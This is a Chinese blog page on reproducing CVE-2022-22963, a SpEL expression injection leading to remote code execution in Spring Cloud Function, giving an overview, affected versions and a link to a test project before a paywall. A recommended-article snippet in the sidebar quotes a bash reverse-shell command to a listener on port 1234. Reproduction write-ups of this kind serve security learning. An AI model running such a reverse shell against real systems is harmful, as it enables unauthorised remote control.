Spring Cloud Function SpEL表达式注入(CVE-2022-22963)

最新推荐文章于 2024-04-06 04:00:11 发布
最新推荐文章于 2024-04-06 04:00:11 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: 漏洞复现 Web安全 文章标签: spring cloud java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46944519/article/details/123930219
版权

文章目录

声明

本文章仅用于漏洞复现和技术学习,切勿从事非法渗透行为,切记!

前言

在 Spring Cloud Function 版本 3.1.6、3.2.2 和不受支持的旧版本中,当使用路由功能时,用户可以提供特制的 SpEL 作为路由表达式,这可能导致远程代码执行和对本地资源的访问。

一、漏洞概述

Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由 functionRouter 时, HTTP请求头 spring.cloud.function.routing-expression 参数存在 SPEL 表达式注入漏洞 ,攻击者可通过该漏洞进行远程命令执行。

二、影响版本

3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

三、本地复现

使用大佬编译好的项目在本地复现

github地址:https://github.com/Pizz33/Spring-Cloud-Function-SpEL
在这里插入图片描述
查看 Java 版本

了解本专栏 订阅专栏 解锁全文 超级会员免费看
李火火安全阁
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
CVE-2022-22947 Spring Cloud Gateway SpEL 表达式注入 RCE漏洞复现
afei001
03-05 4811
当启用和暴露 Gateway Actuator 端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。
【vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 2956
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
CVE-2022-22963 SpringCloud Function SpEL注入漏洞分析
阿道夫的博客
01-30 2087
在研究分析了CVE-2022-22980 Spring Data MongoDBSpEL表达式注入漏洞之后,想起之前在spring4shell爆出之前,存在于SpringCloudFunction中的一个SpEL表达式注入漏洞,编号为CVE-2022-22963。在这里对其进行一波分析和学习。
SPEL表达式注入漏洞,程序员如何自我学习和成长
最新发布
m0_61331491的博客
04-06 924
使用T(type)的语法格式为:T(package,ClassName),其中package是指类所在的包名,ClassName是类名,例如,要获取java.lang.String类的class对象,可以使用表达式T(java.lang.String)。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。它们都提供了表达式求值所需的上下文信息,但是在具体实现方面略有不同。
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行 漏洞复现
热爱学习,喜欢折腾!
08-28 5172
SpringCloud 是一套分布式系统的解决方案,实现就是函数式编程,在视频转码、音视频转换、数据仓库ETL等与状态相关度低的领域运用的比较多。开发者无需关注服务器环境运维等问题上,专注于自身业务逻辑实现即可。在Spring Cloud Function版本3.1.6,3.2.2和更早的不受支持的版本中,当使用路由功能时,用户可以提供特制的SpEL作为路由表达式,这可能导致远程执行代码和访问本地资源。............
Spring Cloud Function SPEL表达式注入漏洞
Blue的博客
04-12 474
漏洞概述 该漏洞是由于Spring Cloud Function中RoutingFunction类的 apply方法将请求头中spring.cloud.function.routing-expression传入的参数值作为SPEL表 达式进行处理,攻击者可以通过构造恶意的语句来实现SPEL表达式注入漏洞。 影响版本 3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2 漏洞复现 1.环境搭建 利用编译好的环境进行本地复现,下载地址: ht
Spring Cloud Function SpEL 代码注入(CVE-2022-22963)漏洞复现
Pluto.的博客
11-21 835
Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
SpringCloud Function SpEL 注入漏洞分析(CVE-2022-22963SpringCloud FunctionSpring 提供的一套分布式函数式编程组件,旨在帮助开发者专注于业务逻辑实现,而不需要关心服务器环境运维等问题。然而,在 ...
SPRING CLOUD FUNCTION SPEL表达式注入漏洞测试服务端程序
03-30
用于Spring Cloud Function SPEL表达式注入漏洞测试环境搭建,是编译好的服务端程序,命令号java -jar *.jar运行即可,服务端运行在127.0.0.1:8080端口
CVE-2022-22947 SpringCloud GateWay SpEL RCE.doc
07-09
CVE-2022-22947 SpringCloud GateWay SpEL RCE CVE-2022-22947是一种影响SpringCloud GateWay的远程代码执行漏洞,通过SpEL(Spring Expression Language)实现RCE(Remote Code Execution)。下面是关于该漏洞的...
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 批量检测脚本:python Spel_RCE_POC.py url.txt 反弹...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
Spring Cloud function CVE-2022-22963
王嘟嘟的博客
04-14 3494
0x00 前言 洞出来了有一段时间了,还是简单的来看一下。 0x01 概述 1.Spring Cloud function 主要功能: 通过功能促进业务逻辑的实现。 将业务逻辑的开发生命周期与任何特定的运行时目标分离,以便相同的代码可以作为Web端点,流处理器或任务运行。 支持无服务器提供商之间的统一编程模型,以及独立运行(本地或PaaS)的能力。 在无服务器提供商上启用Spring Boot功能(自动配置,依赖注入,指标)。 2.影响版本 3 <= 版本 <= 3.2.2 0x02 漏
SpringBoot使用RouterFunction找不到相关的页面
tangyaya8的博客
03-24 2293
问题描述: 今天使用RouterFunction编程, 但是定义了Handler,router,还有相对应的path,但是访问endpoint,返回404,怎么找都没有错,最后发现在pom文件中同时引用了 <dependency> <groupId>org.springframework.boot</groupId> &...
Spring Cloud Gateway各种路由的配置与用途
Bballchen的博客
04-01 1792
Spring Cloud Gateway有多种方式配置路由
漏洞通告 | Spring Cloud Function 拒绝服务漏洞;微软6月多个安全漏洞
zz_tech的博客
06-17 1245
Spring Cloud Function 拒绝服务漏洞;微软6月多个安全漏洞
【墨菲安全实验室】Spring Cloud Function 3.0.0.RELEASE~3.2.2版本SPEL 表达式注入
murphysec的博客
03-26 1967
实验室昨天第一时间监测到的0day漏洞,目前已上线检测 3月25日,墨菲安全实验室监测发现 Spring Cloud Function 修复了 Spel 表达式注入漏洞,已 2022.03.25 日17时提交CNVD,并上线检测能力。 漏洞发现时间:2022-03-24 漏洞验证时间:2022-03-25,已第一时间提交CNVD 标题:Spring Cloud Function 3.0.0.RELEASE~3.2.2 版本SPEL表达式注入漏洞 发现方式:墨菲安全实验室情报预警监控 语言:ja.
Spring Cloud Function SpEL 代码注入漏洞复现 (CVE-2022-22963)
yang1234567898的博客
04-25 3764
漏洞复现 启动vulhub靶场环境,出现下面的页面说明启动成功 首先,先用nc监听1234端口 需要将反弹shell的命令进行编码 bash -i >& /dev/tcp/192.168.96.1/1234 0>&1 编码脚本如下,直接复制改后缀名为.html打开即可 <!DOCTYPE html> <html> <head> <title>java runtime exe...
SpringBoot SpEL表达式注入漏洞-分析与复现
06-02
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析与复现。 一、漏洞分析 SpringBoot中的SpEL(Spring Expression ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李火火安全阁

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值